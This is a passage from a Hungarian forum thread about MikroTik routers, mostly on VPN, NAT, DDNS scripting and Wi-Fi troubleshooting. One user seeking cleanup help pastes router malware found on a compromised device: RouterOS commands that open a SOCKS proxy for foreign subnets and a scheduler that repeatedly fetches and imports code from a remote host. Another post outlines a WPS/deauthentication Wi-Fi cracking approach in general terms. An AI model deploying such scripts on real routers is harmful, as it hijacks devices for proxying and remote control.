- One mobilszolgáltatások
- iGO Primo
- Folyamatos vérnyomásmérést kínál a Huawei Watch D2
- Samsung Galaxy Watch7 - kötelező kör
- VoLTE/VoWiFi
- Samsung Galaxy S21 FE 5G - utóirat
- Motorola Edge 50 Neo - az egyensúly gyengesége
- Honor Magic6 Pro - kör közepén számok
- Milyen GPS-t vegyek?
- Egy szenzor, két zoomkamera: újraírta a Huawei a mobilfotózás történetét
-
Mobilarena
Mikrotik routerekkel foglalkozó téma. Mikrotik router típusok, hardverek, router beállítások, programozás (scriptek írása), frissítés, és minden Mikrotik routerrel kapcsolatos beszélgetés helye.
Új hozzászólás Aktív témák
-
Istv@n
aktív tag
Sziasztok!
Nem próbálta valaki véletlenül a mindenamimikrotik.hu -n található online tanfolyamokat?
A havidíjas konstrukciót nézem, de elég kevés az infó róla. Ha befizetek egy hónapra, mondjuk az online All in csomagra, akkor egy hónapon keresztül teljes hozzáférésem van az összes tananyaghoz, vagy van esetleg valamilyen korlátozás? -
ekkold
Topikgazda
Meg is van mi lett vele... Amikor frissítettem a routert, akkor újra kellett indítani, ekkor a netre is újra csatlakozott, azonban az új IP cím amit kiosztottak - az eddigiekkel szemben - egy NAT-olt, nem publikus IP. Ezért nem érem el távolról a routert... Írtam a digi ügyfélszolgálatnak egy email-t (mivel a telefont nem veszik fel), hogy ez így nem ok. Meglátjuk történik-e érdemben valami.
-
A_ScHuLcZ
addikt
Attól tartok nem fogom megúszni a netinstallt és az újrakonfigolást.
Délután még mozgattam távolról, most viszont se lokál hálóról, se arról az IP-ről nem tudok belépni, ahova szűkítve van a service elérése.
Lokál háló esetén: mindegy milyen adatokat írok be, a winbox Logging in-nél megáll, ssh-t pedig egyből visszadobja.
A megfelelő távoli címről próbálkozva winbox-ban Could not connect üzenet jön szembe, ssh pedig timeoutol.
-
A_ScHuLcZ
addikt
válasz
bambano
#5687
üzenetére
Megtaláltam a kis rohadékot, ide fészkelte be magát:
Ha a logban nem tapasztalok semmi furát, akkor bízhatok benne, hogy sikerült kiirtani?
A flash is teljesen üres:
Nem ártana tudni hogyan jutott be, hogy legközelebb ne forduljon elő, de erre gondolom keresztet vethetek logok nélkül. (a régi szoftver sérülékenységének kihasználására tippelek)
-
#5688
Core2duo6600
veterán
bambano
#5687
Core2duo6600
veterán
válasz
bambano
#5687
üzenetére
Minden bizonnyal erre gondoltál :
https://wiki.mikrotik.com/wiki/Manual
etinstall -
A_ScHuLcZ
addikt
Sziasztok!
Feltételezhetően feltört eszközt hogyan tudok megtisztítani? Belépéskor a log tele volt hibaüzenetekkel, és volt egy script, aminek a forrása ismeretlen.
Log bejegyzés, ami ismétlődött:
script error: expected end of command (line 3 column 86)A scriptben ez állt:
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=httpA letöltött mikrotik.php fájlt töröltem, de azért letöltöttem pc-re, és belenéztem, ilyen bejegyzésekkel volt tele:
/system scheduler remove [find name !="U3" && name !="U4"]
/ip socks set enabled=yes port=44550
{ :local countRules [/ip socks access print count-only]; :for i from 0 to $countRules-1 step=1 do= {/ip socks access remove $i} }
/ip socks access add src-address=5.188.42.224/29 action=allow
/ip socks access add src-address=5.188.42.232/30 action=allow
/ip socks access add src-address=5.188.42.236/31 action=allow
/ip socks access add src-address=5.188.42.238/32 action=allow
/ip socks access add src-address=5.188.42.96/29 action=allow
/ip socks access add src-address=5.188.42.104/30 action=allow
/ip socks access add src-address=5.188.42.108/31 action=allow
/ip socks access add src-address=5.188.42.110/32 action=allow
/ip socks access add src-address=5.189.235.80/30 action=allow
/ip socks access add src-address=5.189.235.84/31 action=allow
/ip socks access add src-address=5.189.235.86/32 action=allow
/ip socks access add src-address=192.243.53.14/32 action=allow
/ip socks access add src-address=192.243.53.15/32 action=allow
/ip socks access add src-address=192.243.53.31/32 action=allow
/ip socks access add src-address=46.20.39.117/32 action=allow
/ip socks access add src-address=78.46.114.23/32 action=allow
/ip socks access add src-address=213.202.230.152/32 action=allow
/ip socks access add src-address=31.184.224.107/32 action=allow
/ip socks access add src-address=31.184.224.108/32 action=allow
/ip socks access add src-address=31.184.224.109/32 action=allow
/ip socks access add src-address=5.188.42.109/32 action=allow
/ip socks access add src-address=0.0.0.0/0 action=denyEddig elvégzett műveletek:
- idegen script és job törlése
- winbox-on kívül minden service tiltása, winbox is kizárólag egy távoli ip-ről engedélyezve
- ip socks kikapcsolása
- user pw csere
- fw és RouterOS frissítés 6.43-ra, majd rebootMár nem látok idegen scriptet, de a log-ban a fenti bejegyzés időnként továbbra is megjelenik. A mikrotik.php fájl időnként továbbra is letöltődik, továbbá 5 percenként egy 7xe7zt46hb08 nevű fájl is letöltődik, aminek a tartalma az alábbi:
:do { /system scheduler set U3 name="U5" on-event="/tool fetch url=http://ciskotik.com/poll/4e57ce74-3959-441c-be72-2ead3b6d0e57 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U3 not found"}:do { /system scheduler set U4 name="U5" on-event="/tool fetch url=http://ciskotik.com/poll/4e57ce74-3959-441c-be72-2ead3b6d0e57 mode=http dst-path=7xe7zt46hb08\r\n/import 7xe7zt46hb08" } on-error={ :put "U4 not found"}
Mit tudok tenni? (nem látok se script-et, se job-ot, más módszerrel csinálja)
-
-
#5678
ekkold
Topikgazda
Core2duo6600
#5677
ekkold
Topikgazda
válasz
Core2duo6600
#5677
üzenetére
Gondolom akkor nem volt túl bonyolult a jelszó. WPA2-AES titkosítás esetén, egy kellően hosszú jelszót nem valószínű, hogy fel tudnál törni.
-
#5677
Core2duo6600
veterán
ekkold
#5676
-
ekkold
Topikgazda
A RouterOs volt frissítve mostanában?
Miért TKIP ? Általában a WPA2+AES a biztonságosabb, és minden eszköz ezt preferálja.
Nem jelent meg a TKIP-hez valamilyen törés mostanában? Biztos nem próbálja hekkelni valaki?Kb 10éve, a saját hálózatomon, az akkori TP-Link routeremen kipróbáltam mennyire törhető. Ha a WPS gombos (PIN kódos) belépés engedélyezve volt, akkor sikerült feltörni és a WPA2 jelszóhoz is hozzáférni! Letiltott WPS esetén nem sikerült feltörni. Viszont a törés úgy működik, hogy olyan kamu csomagokat küld a klienseknek, amitől azt hiszik ledobta őket a wifi, ilyenkor újra csatlakoznak (esetleg másik AP-hez ha több van). A hacker program elkapja az újracsatklakozáskor küldött csomagokat. Ha egyszerű a jelszó, vagy ha a PIN kód is engedélyezett, akkor 1000....10000 csomagot begyűjtve néhány óra alatt sikerülhet a visszafejtés.
-
zamar
csendes tag
Sziasztok!
Az alábbi problémám lenne RB433Gl boardal és R52nM Wifi kártyával AP módban. Véletlenszerűen az összes rácsatlakozott eszközt eldobja MIC failure hibával a log-ban. Van esetleg ötletetek mi okozza? Mikorotik manual szerint: TKIP message integrity check failure, somebody must be trying to break into or DOS network, If more than 1 MIC failure is encountered during 60s period, "TKIP countermeasures" state is entered. de ezt én kizártnak tartom. Két ilyen eszköz is van és mindegyiknél előfordul. Ha az egyik router eldobja az eszközöket akkor azonnal felcsatlakoznak a másikra ami hatótávon belül van, de van csomagvesztés így a munka sem zavartalan és elég nagy problémát okoz. Próbáltam úgy hogy lekapcsoltam másik hatótávon belül lévő eszközt de a hiba így is jelentkezik csak nem másikra hanem ugyan arra csatlakoznak vissza.
Válaszotokat előre is köszönöm.
-
#5674
ekkold
Topikgazda
Core2duo6600
#5673
ekkold
Topikgazda
válasz
Core2duo6600
#5673
üzenetére
Elvileg ott volt mögötte, gyakorlatilag meg valószínűleg csak egy portot használt.
-
#5671
ekkold
Topikgazda
Core2duo6600
#5668
ekkold
Topikgazda
válasz
Core2duo6600
#5668
üzenetére
Attól, hogy továbbítva van egy port, még nem fog válaszolni is egy külső kérésre, csak akkor, ha a cél címen van is valamilyen szolgáltatás mögötte ami válaszolni tud.
-
#5669
bambano
titán
E.Kaufmann
#5661
bambano
titán
válasz
E.Kaufmann
#5661
üzenetére
"A beépített sw-k képességeit már kritizálják a hivatalos Miki fórumon.": azt nehezen... merthogy nincsenek
szerintem is súlyos hiba volt ilyen gagyi switch-csel kihozni ezt a routert.
-
#5668
Core2duo6600
veterán
ekkold
#5658
Core2duo6600
veterán
Így állítottam be :
;;; rTorrent Atom
chain=dstnat action=dst-nat to-addresses=192.168.1.6 to-ports=61001-61250 protocol=tcp in-interface=Digi-PPPOE dst-port=61001-61250 log=no log-prefix=""9 chain=dstnat action=dst-nat to-addresses=192.168.1.6 to-ports=61001-61250 protocol=udp in-interface=Digi-PPPOE dst-port=61001-61250 log=no log-prefix=""
Amikor a ping.eu val ellenőríztem, akkor a csak a 61001 es re írta, hogy open.
Hogy most azért, mert a rtorrent csak azt figyeli annak ellenére, hogy tartomány volt megadva gyárilag is benne, nem pont ez, de ugyanekkora, vagy a miki nem küldi ki, ezt nem tudom. -
#5667
ekkold
Topikgazda
E.Kaufmann
#5661
ekkold
Topikgazda
válasz
E.Kaufmann
#5661
üzenetére
Utánaolvastam én is. Szerintem otthoni felhasználásban nem tud problémát okozni a VLAN-ok szoftveres kezelése. Valószínűleg ezzel együtt sem igazán fut otthon semmi olyan, ami képes lenne komolyabban megterhelni ezt a CPU-t.
-
#5664
ekkold
Topikgazda
E.Kaufmann
#5661
ekkold
Topikgazda
válasz
E.Kaufmann
#5661
üzenetére
Tulajdonképpen mi a gond a sw-el?
-
#5662
Shkiz0
nagyúr
E.Kaufmann
#5661
válasz
E.Kaufmann
#5661
üzenetére
Igen láttam, beleolvasgattam.
Pedig vártam amúgy rá, mert így akkor az RB450Gx4+hAPc kombót válthatta volna, de látva az árát marad minden
Amúgy októbertől lesz elvileg elérhető. -
Megjelent a 4011 a mikrotik hivatalos oldalán
RB4011iGS+5HacQ2HnD-IN
RB4011GS+RMOlcsónak nem mondanám őket
-
#5659
Ablakos
őstag
Core2duo6600
#5657
Ablakos
őstag
válasz
Core2duo6600
#5657
üzenetére
A dstnat action a csomag célcímét változtatja az általad megadottra. A netmap action címtartományra vonatkozik. Párja a same action. Hasonlóak, de a same biztosítja, hogy a NAT-olt kliensed mindig ugyanazt a címet kapja bármennyi kapcsolatot is nyit.
-
#5658
ekkold
Topikgazda
Core2duo6600
#5657
ekkold
Topikgazda
válasz
Core2duo6600
#5657
üzenetére
Igen lehetséges pl.
/ip firewall nat add action=dst-nat chain=dstnat dst-port=57030-57039 in-interface=pppoe-digi protocol=tcp to-addresses=192.168.5.33 to-ports=57030-57039A netmap-ot én a soho routerek DMZjéhez hasonlítanám.
-
#5657
Core2duo6600
veterán
Core2duo6600
veterán
Lehetséges a miki vel port tartományt forwardolni, egy belső ip re ?
pl 64000- 64050 ig, ez lehetséges ?Mi a különbség a dstnat és a netmap között ?
-
kovyhun
tag
válasz
Core2duo6600
#5650
üzenetére
Külterület, egy szőlőhegy.
Elérhető wifis internet, de mivel még erősen felújítás alatt van a ház, nem szeretnék feleslegesen minden hónapban havidíjat fizetni. A mobilnet most csak átmeneti megoldás hogy az ott dolgozó raspberryket távolról elérjem, ezért is nem akarok sokat költeni rá. -
ekkold
Topikgazda
válasz
kovyhun
#5652
üzenetére
Gondolom ez azért nehéz ügy, mert a mikrotiknek nincs lehetősége minden megjelenő típus esetén ellenőrizni a kompatibilitást. Ezek az USB-s kütyük valamennyire szabványos felülettel kommunikálnak (hasonló a régi vonalas modemek AT parancskészletéhez csak lényegesen több parancsot támogat), de azok a típusok amelyek működéséhez egyedi parancsok kellenek nem biztos hogy működni fognak. Ugyanakkor a standard parancskészlettel jól működő típusok akkor is működhetnek kifogástalanul, ha egyébként nem szerepelnek a kompatibilitási listában.
-
bacus
őstag
válasz
Adamo_sx
#5653
üzenetére
Ez konkrétan jó tipus, át kellett konfigolni, mert nem lte modemként ismeri fel, de stabil 30/30 Mbitet tud nálam, évek óta használom kempingben egész nyáron május-szeptember. Soha nem kell újraindítani, tápot elvenni. 100 nap folyamatos online, után is áramszünet miatt indult újra.
Egy rb952-be van bedugva, érdekesség, hogy 951g-vel nem ment (2 éve legalábbis)
Ugyanilyen konfigot csináltam még pár embernek, még egyet se hoztak vissza problémával.
-
kovyhun
tag
Ezt a táblázatot nézegettem már ha erről van szó: https://wiki.mikrotik.com/wiki/Supported_Hardware
De inkább tapasztalat érdekelne, mi az mi nálunk beszerezhető, nem túl drága és bevállt, nincsenek nyűgjei.
A táblázatban a most használt 3G modemem sincs benne, valószínű nem teljes a lista, illetve ugyanaz a hardver több néven is kijöhetett. -
Istv@n
aktív tag
Sziasztok!
Most kezdek behatóbban ismerkedni a Mikrotik-kel. Első körben szeretnék egy hAP ac2 -vel egy Gb-es internetet megosztani, teljesen szeparált vendég wifivel, valamint erre még vezetékkel rákötni egy wsAP ac-t amin ugyan így 2 wifi hálózatnak kellene lennie (fő + vendég).
Jól látom ugye, hogy az eszköz elvileg képes erre? -
#5647
Poo
senior tag
Cirbolya_sen
#5643
Poo
senior tag
válasz
Cirbolya_sen
#5643
üzenetére
Ez esetleg? Bár még mindég nem értem mit szeretnél a mikrotiken az ilyen kábellel :-)
-
#5643
Cirbolya_sen
aktív tag
Poo
#5642
Cirbolya_sen
aktív tag
-
#5642
Poo
senior tag
Cirbolya_sen
#5641
Poo
senior tag
válasz
Cirbolya_sen
#5641
üzenetére
Aten uc232a+soros kábel?
-
#5640
Poo
senior tag
Cirbolya_sen
#5639
Poo
senior tag
válasz
Cirbolya_sen
#5639
üzenetére
Esetleg próbáld ki egy sima patch kábellel , ez nem cisco
-
#5639
Cirbolya_sen
aktív tag
Cirbolya_sen
aktív tag
Sziasztok, van egy szerelhető rj45/rs232_db9 adapterem, bekötéshez kérném a segítséget,.mikrotik konzol portra szeretnék csatlakozni vele, és egy usb-rj45 cisco konzol kábellel.
Sokféle leírást találtam, de nem tiszta mit és hogyan
-
-
#5637
Cirbolya_sen
aktív tag
kovyhun
#5636
Cirbolya_sen
aktív tag
válasz
kovyhun
#5636
üzenetére
Ez no-ip-s script, ami neked van
dyndns script:
#DynDns mikrotik config
:global ddnsuser "xxxxxxx"
:global ddnspass "xxxxx"
:global theinterface "pppoe-out1"
:global ddnshost xxxxx.dyndns.org
:global ipddns [:resolve $ddnshost];
:global ipfresh [ /ip address get [/ip address find interface=$theinterface ] address ]
:if ([ :typeof $ipfresh ] = nil ) do={
:log info ("DynDNS: No ip address on $theinterface .")
} else={
:for i from=( [:len $ipfresh] - 1) to=0 do={
:if ( [:pick $ipfresh $i] = "/") do={
:set ipfresh [:pick $ipfresh 0 $i];
}
}
:if ($ipddns != $ipfresh) do={
:log info ("DynDNS: IP-DynDNS = $ipddns")
:log info ("DynDNS: IP-Fresh = $ipfresh")
:log info "DynDNS: Update IP needed, Sending UPDATE...!"
:global str "/nic/update\?hostname=$ddnshost&myip=$ipfresh&wildcard=NOCHG&mx=NOCHG&backmx=NOCHG"
/tool fetch address=members.dyndns.org src-path=$str mode=http user=$ddnsuser \
password=$ddnspass dst-path=("/DynDNS.".$ddnshost)
:delay 1
:global str [/file find name="DynDNS.$ddnshost"];
/file remove $str
:global ipddns $ipfresh
:log info "DynDNS: IP updated to $ipfresh!"
} else={
:log info "DynDNS: dont need changes";
}
}mi van beállítva "time server"-nek?
Google, vagy time.kfki.hu szokott nálam a routerekben benne lenni -
kovyhun
tag
válasz
Cirbolya_sen
#5634
üzenetére
Az érdekel engem is, mert amit betettem, az mindig azt írja hogy megváltozott és frissíti, pedig nem volt változás.
# No-IP automatic Dynamic DNS update
#--------------- Change Values in this section to match your setup ------------------
# No-IP User account info
:local noipuser "user"
:local noippass "pass"
# Set the hostname or label of network to be updated.
# Hostnames with spaces are unsupported. Replace the value in the quotations below with your host names.
# To specify multiple hosts, separate them with commas.
:local noiphost "host.ddns.net"
# Change to the name of interface that gets the dynamic IP address
:local inetinterface "pppoe-out1"
#------------------------------------------------------------------------------------
# No more changes need
:global previousIP
:if ([/interface get $inetinterface value-name=running]) do={
# Get the current IP on the interface
:local currentIP [/ip address get [find interface="$inetinterface" disabled=no] address]
# Strip the net mask off the IP address
:for i from=( [:len $currentIP] - 1) to=0 do={
:if ( [:pick $currentIP $i] = "/") do={
:set currentIP [:pick $currentIP 0 $i]
}
}
:if ($currentIP != $previousIP) do={
:log info "No-IP: Current IP $currentIP is not equal to previous IP, update needed"
:set previousIP $currentIP
# The update URL. Note the "\3F" is hex for question mark (?). Required since ? is a special character in commands.
:local url "http://dynupdate.no-ip.com/nic/update\3Fmyip=$currentIP"
:local noiphostarray
:set noiphostarray [:toarray $noiphost]
:foreach host in=$noiphostarray do={
:log info "No-IP: Sending update for $host"
/tool fetch url=($url . "&hostname=$host") user=$noipuser password=$noippass mode=http dst-path=("no-ip_ddns_update-" . $host . ".txt")
:log info "No-IP: Host $host updated on No-IP with IP $currentIP"
}
} else={
:log info "No-IP: Previous IP $previousIP is equal to current IP, no update needed"
}
} else={
:log info "No-IP: $inetinterface is not currently running, so therefore will not update."
}Más:
Gyakran elállítódik az idő, kézzel kell beállítanom. Van mikor épp beállítanám, hirtelen átugrik a jó időre, dátumra. Mi lehet az oka? -
kovyhun
tag
Köszönöm.
(az előzőleg bemásolt táblában volt egy elírás, azt javítottam: 1.0.0.2 -> 1.1.1.2)
Nem nagyon volt időm ma rá, nem is vagyok otthon, így nem tudom teljesen lepróbálni.
A két router tudja pingelni egymást, a mobilnetesről el is érem a másikat, viszont fordítva nem ment.
De ennek már örülök, hogy alakul valami
Köszönöm mindenkinek az eddigieket, innen talán már boldogulok."Ja és a konfigurációt így szokták megadni: /IP route export"
Ez nekem nem működik, csak ezt adja vissza (nagy IP-vel meg hiba):admin@MikroTik-Home] > /ip route export
# sep/03/2018 17:13:33 by RouterOS 6.42.7
# software id = 6ZNW-J7ZR
#
# model = RouterBOARD 941-2nD
# serial number = 6DE0674F83514
[admin@MikroTik-Home] > -
ekkold
Topikgazda
válasz
kovyhun
#5629
üzenetére
Akkor haladjunk lépésenként.
Ping működik-e, tehát a VPN kapcsolat mindkét végét tudod-e pingelni?
Ha nem, akkor nem olehet, hogy valami tűzfal szabály blokkolja a kapcsolatot?Amúgy az ADSL oldalon:
/IP route
DST address: 10.0.0.0/24 Gateway: 1.1.1.2Mobilnet oldalon
/IP route
DST address: 10.0.1.0/24 Gateway: 1.1.1.1Semmi egyéb nem kell hozzá.
Ja és a konfigurációt így szokták megadni:
/IP route exportA teljes konfig pedig simán:
exportA tűzfal:
/IP firewall filter export -
kovyhun
tag
Igen mindig a route táblánál akadok el
Most ehhez hasonlóan próbáltam, de itt is a route beállítás nem ment:
https://systemzone.net/mikrotik-vpn-configuration-with-site-to-site-pptp/
Most adatforgalom sincsA felépítés:
Otthon
ADSL pptp szerver ------ internet ------- Mobilnet pptp kliens
LAN:10.0.1.1 - 1.1.1.1 -------------------- 1.1.1.2 - LAN:10.0.0.1[admin@MikroTik-ADSL] /ip route> print
Flags: X - disabled, A - active, D - dynamic, C - connect, S - static, r - rip, b - bgp, o - ospf, m - mme, B - blackhole, U - unreachable, P - prohibit
# DST-ADDRESS PREF-SRC GATEWAY DISTANCE
0 ADS 0.0.0.0/0 pppoe-out1 0
1 ADC 1.1.1.2/32 1.1.1.1 <pptp-vpn-hegy> 0
2 DS 10.0.0.0/24 1.0.0.2 1
3 ADC 10.0.1.0/24 10.0.1.1 bridge 0
4 ADC 145.235.238.12/32 78.92.79.23 pppoe-out1 0
[admin@MikroTik-Home] /ip route>-
[admin@MikroTik-Mobilnet] /ip route> print
Flags: X - disabled, A - active, D - dynamic, C - connect, S - static, r - rip, b - bgp, o - ospf, m - mme, B - blackhole, U - unreachable, P - prohibit
# DST-ADDRESS PREF-SRC GATEWAY DISTANCE
0 ADS 0.0.0.0/0 Telekom-mobil--... 1
1 ADC 1.1.1.1/32 1.1.1.2 vpn-otthon 0
2 ADC 10.0.0.0/24 10.0.0.1 bridge 0
3 A S 10.0.1.0/24 vpn-otthon 1
4 ADC 10.112.112.137/32 10.143.67.237 Telekom-mobil--... 0
[admin@MikroTik] /ip route>Az a baj, hogy nem látom át mi-mikor-merre...
Sőt, maradhattak benne előző próbálkozásokból is bejegyzések. -
-
-
kovyhun
tag
Valójában csak kapkodok ide-oda, nem tudom melyik megoldás a jobb és egyszerűbb.
Adott egy nyaraló hálózata: 10.0.0.x mobilnettel és otthoni hálózat 20.0.0.x.
Mivel a nyaralóban futnak majd olyan dolgok amiket szeretnék elérni, de a nat-olt mobilnet miatt ez közvetlenül nem megy, ezért merült fel a VPN mint megoldás.
Ezzel az utolsó megoldással jutottam legtovább, a tunnel (1.1.1.x hálózaton megy) túlsó végét elérem de az ott lévő routert már nem. Illetve a szerver valamiért a mobilneten megy ki az internetre.
Lehet csak az útválasztást kellene jól beállítani.
Már az is nagy segítség hogy mivel érdemes megoldani, akkor ezt kidobom és arra keresek, próbálkozok tovább. Csak a két hálózat összekötése a cél, több kliensre nincs szükség.
Eddig csak hagyományos butább routerekkel volt dolgom, de ehhez már ajánlották inkább valami normálisabbat használjak. -
ekkold
Topikgazda
válasz
kovyhun
#5619
üzenetére
Ez nem lesz jó neked. Pl. az EOIP átviszi a teljes ethernet protokollt, többek között a DHCP is átmegy rajta. Ha mindkét hálózatban van DHCP szerver, akkor abból nagy katyvasz lehet! (Tudja valaki hogy lehet ezt elkerülni?). Az SSTP a leglassúbb VPN amit próbáltam eddig, az L2TP , L2TP+IPsec, és a PPTP is gyorsabb.
Csak egy sima pptpt vagy l2tp VPN kapcsolat kell (amelyik átmegy a mobilneten), és megfelelő routing szabályt felvenni hozzá. Ennyi elég is hogy IP alapon lássa egymást a két hálózat. Igaz, a netbios nevek meg ilyenek nem jönnek át, tehát mondjuk egy szervert a neve alapján nem érsz el csak az IP címe alapján (kivéve ha a hosts fájlba felveszed a nevét, de az már windows téma).
Ja..., és továbbra sem ismerjük a routereid konfigját.
-
bacus
őstag
válasz
kovyhun
#5621
üzenetére
Nem tudom pontoson mit szeretnél, de EOIP -t is használsz, két telephely összekötésekor ez legalább annyi hibalehetőséget tartalmaz, mint amennyi előnyt.
Ilyenkor a két hálózat olyan, mintha a két routered LAN portját összedugnád madzaggal.
Az igazi előny akkor jön meg, ha azonos alhálózatban van mind a két oldal, ilyenkor még a windows hálózatoknál is látod a túl oldali gépeket, nyomtatókat (mac alapon is), wins szerver nélkül, de a hátrány is ebből jön, a két oldalon figyelni kell az ip cím ütközésre, nagyon nem mindegy, ki milyen átjárót kap, honnan kap ip címet (ha mind a két router oszt, ezt szabályozni is kell), stb.Ird le mit szeretnél, ha már az tiszta lesz, biztos kapsz itt segítséget, vagy kis donation és csak hátra kell dőlj a karosszékben a tévé előtt.
-
bacus
őstag
A pool a remote addresshez kell, a local address lehet minden kliens esetén azonos, ez a router ip címe.
Ettől még több kliens csatlakozhat azonos jelszóval, mind más ip címet fog kapni, hiszen az a poolból jön.Még sosem láttam, hogy a local address is poolbol legyen kiosztva, nem is igazán értem, miért jó,ha minden kliens mást lát..
"Némelyik mobilnetes szolgáltató korlátozza a VPN használatát (persze ha reklamálsz, simán hazudnak és letagadják)."
Nem némelyik, hanem mindegyik és csomagtól függ. Nyilván egy korlátlan beszédforgalom mellett nincs értelme korlátozni a vpn -t, senki nem akar skype,viber,whatsappon trécselni bizonytalan minőségben.
A korlátozást a szolgáltató azzal éri el, hogy melyik APN-t tudod használni az előfizetéseddel. Mind a 3 szolgáltatónak publikus minden APN címe, ha tiltják a vpn-t, akkor meg kell nézni megy e a másik APN-el.Ráadásnak ez a tiltás is általában csak a PPTP vpn-re vonatkozik.
-
-
kovyhun
tag
Többfélét próbáltam, legutoljára eszerint állítottam be (a bridge-es rész nem teljesen egyértelmű, a leírás készítése óta változott a felület)
https://mum.mikrotik.com/presentations/MM15/presentation_2962_1445240964.pdf
Ez a kliens mobilnetes router (10.0.0.1):
Csatlakozik, látszólag van valami adatforgalom, de a szerver 20.0.0.1 ping-re nem válaszol.
(sőt a winbox is leszakad többször a kliens router-ról pedig közvetlen annak a wifijére csatlakoztam) -
ekkold
Topikgazda
válasz
kovyhun
#5617
üzenetére
A quick set csak az abszolút kezdők kedvéért van, komolyabb felhasználás esetén felejtős, mert az os verzióval változhat, hogy pontosan miket is állít be, ezért nehéz bármilyen további beállítással kiegészíteni. Magyarul ebből nem tudjuk, hogy mi van most beállítva, ezért azt sem tudhatjuk, hogy miért nem működik. Neked is javaslom ezt elolvasásra. Ezen kívül olvass utána az export parancsnak, és próbáld meg is érteni. Gyakorlatilag most még azt sem tudjuk, hogy milyen VPN-t állítottál be.
-
kovyhun
tag
Igen, ezen a mobilneten nincs publikus ip-m és mivel ott futó kiszolgálókat is el kell érnem ezért gondoltam hogy vpn-el megoldható. Az adsl-es routert próbálgattam szervernek beállítani, a "quick set" panelen könnyen be is kapcsolható, de nem tudom hogy kell-e még állítani valamit.
Ping-et nem próbáltam csak tracert-et, az nem ment végig.
Egy biztosan jó kliens beállítást találok valahol? -
ekkold
Topikgazda
válasz
vampire17
#5612
üzenetére
Elég nyakatekert megoldás, de olyasmit lehetne csinálni, hogy amikor bent vagy, akkor jóval nagyobb jelszinten csatlakozol a 2.4GHz-re is mint kintről. Meg kell nézni mennyi ez a jelszint, és írni egy scriptet ami egy adott jelszint felett ledobja a klienst a 2.4GHz-ről, így az kénytelen lesz átcsatlakozni 5GHz-re. A script esetleg figyelhetné, hogy csak adott MAC address esetén működjön.
-
ekkold
Topikgazda
válasz
kovyhun
#5614
üzenetére
A mobilnet esetén előfordulhat, hogy nem publikus IP-t kapsz (persze ADSL esetén is előfordulhat, de annak kisebb az esélye). Tehát én az ADSL oldalt állítanám be szervernek, a mobilnetes oldalt kliensnek. Némelyik mobilnetes szolgáltató korlátozza a VPN használatát (persze ha reklamálsz, simán hazudnak és letagadják). Nálad remélhetőleg nem ez a helyzet, hiszen összeáll a kapcsolat.
Próbáld pingelni egyik eszközből a másikat, hogy legalább az működik-e, először a VPN kapcsolat végpont IP címeit, majd a távoli router LAN IP címét. Ha ez már megy akkor lehet foglakozni azzal, hogy lássa is egymást a két hálózat (routing szabályokat kell felvenni).
Viszont ahhoz, hogy ennél részletesebb segítséget kapj, ismernünk kellene a jelenlegi konfigurációs beállításokat.
-
kovyhun
tag
Sziasztok,
szeretnék két helyi hálózatot vpn-el összekötni. Rengeteg leírás van neten, de szinte mindegyik más, jópárat kipróbáltam de csak nem sikerül. Sajnos nagyon kezdő vagyok, még azt sem tudom eldönteni hogy épp a szerver vagy a kliens a problémás. Ha csatlakoznak is egymáshoz adatforgalom nincs közöttük.
Az egyik hálózat adsl-en a másik mobilneten van.
Tud valaki linkelni egy kezdőknek is érthető leírást vagy tudna segíteni? -
Ablakos
őstag
válasz
vampire17
#5612
üzenetére
Ha jól értem nem egy bizonyos frekvencián működő AP-ra szeretnéd erőszakolni a kliens-t, hanem mindig az "erősebb/gyorsabb" AP-ra.
Nem lehet ilyet. Amíg nem szakad meg a kapcsolat, addig lógnak az első rádión.
(Nekem a Dell laptopban van ilyen "preferált frekvencia" lehetőség és az tényleg elég hamar átvált.)Az access listben van lehetőség bűvészkedni a tx limitekkel. Nekem az elég macerás volt, inkább hagytam.
-
vampire17
addikt
Sziasztok!
Egy cAP ac szorja a wifit itthon. A kovetkezo lenne vele kapcsolatban a kerdesem.
Lehetseges-e AP oldalon azt beallitani (mivel a kliensem nem tudja) hogy mi legyen a preferalt sáv, 2.4 vagy 5 GHz?
A problemam az, hogy pl mobillal kimegyek az udvarra, ott ugye mar ertelemszeruen atall 2.4-re majd miutan visszajovok a lakasba, addig 2.4 en marad, amig ujra nem csatlakozom. (ez nyilvan joval alacsonyabb savszelt jelent)
A telo sajnos nem tud preferalt frekvenciasavot, automatikus van vagy 2.4/5GHz.
mindket sav ugyanazon az SSID-n van, ezt nem is szeretnem megvaltoztatni.
-
ekkold
Topikgazda
Tulajdonképpen csak kényelem, mert így a címtartományhoz elég csak a pool-t megfelelően megadni. Amúgy a local address valóban lehetne 1db fix IP cím is. Amikor csak 1db pont-pont kapcsolatot kell beállítani, akkor simán elég 2db fix IP, és pool sem kell. Jelen esetben több kliens is csatlakozhat egyszerre azonos jelszóval (amíg a pool el nem fogy).
-
ekkold
Topikgazda
válasz
f8enter
#5603
üzenetére
A mikrotik wikiben emlékeim szerint le van írva VLAN-ok kezelése. Nekem a virtuális VLAN interfészekkel megoldva átláthatóbb volt a dolog. Gondolom bizonyos switch chipek hardverből kezelik a VLAN-okat, azzal is lehet erőforrást spórolni, hogy nem szoftverből kezeljük - mint a virtuális VLAN interfészt.
-
ekkold
Topikgazda
Ismét kiegészült néhány sorral a mikrotik cikkem.
-
f8enter
aktív tag
Használta már valaki bridgen a VLAN Filtering opciót? Ez valami új dolognak tűnik, mert nem sok leírást látni, a VLAN kialakításoknál nem igazán említik meg.
/interface bridge set bridgeneve vlan-filtering=yes
MÁS:
Az IP-t a bridgehez vagy egy adott portjához rendelitek?
-
f8enter
aktív tag
válasz
f8enter
#5590
üzenetére
Végül sikerült egy SSID-n belül vlanozni a juzereket, a CAPsMAN-nak van rá megoldása.
Ha valaki érdekel, ez segített a legtöbbet, miután megtanultam alapfokon Mikrotikül...
Az alap hálót egy kis "karanténnak" fogom használni, erős sávszél korláttal, és aki "többet akar", az leadja a MAC-jét, ami alapján átkerül a megfelelő VLAN-ba.
Még a manualitáson kicsit reszelek: a UserMan tud olyant, hogy fel lehet venni rajta keresztül a MAC címeket, így el tudom porlasztani az ezzel járó feladatokat a csoportok "felelősei" felé.
etinstall
Új hozzászólás Aktív témák
Hirdetés
- Milyen billentyűzetet vegyek?
- War Thunder - MMO Combat Game
- Kompakt vízhűtés
- One mobilszolgáltatások
- Radeon RX 9060 XT: Ezt aztán jól meghúzták
- OFF TOPIC 44 - Te mondd, hogy offtopic, a te hangod mélyebb!
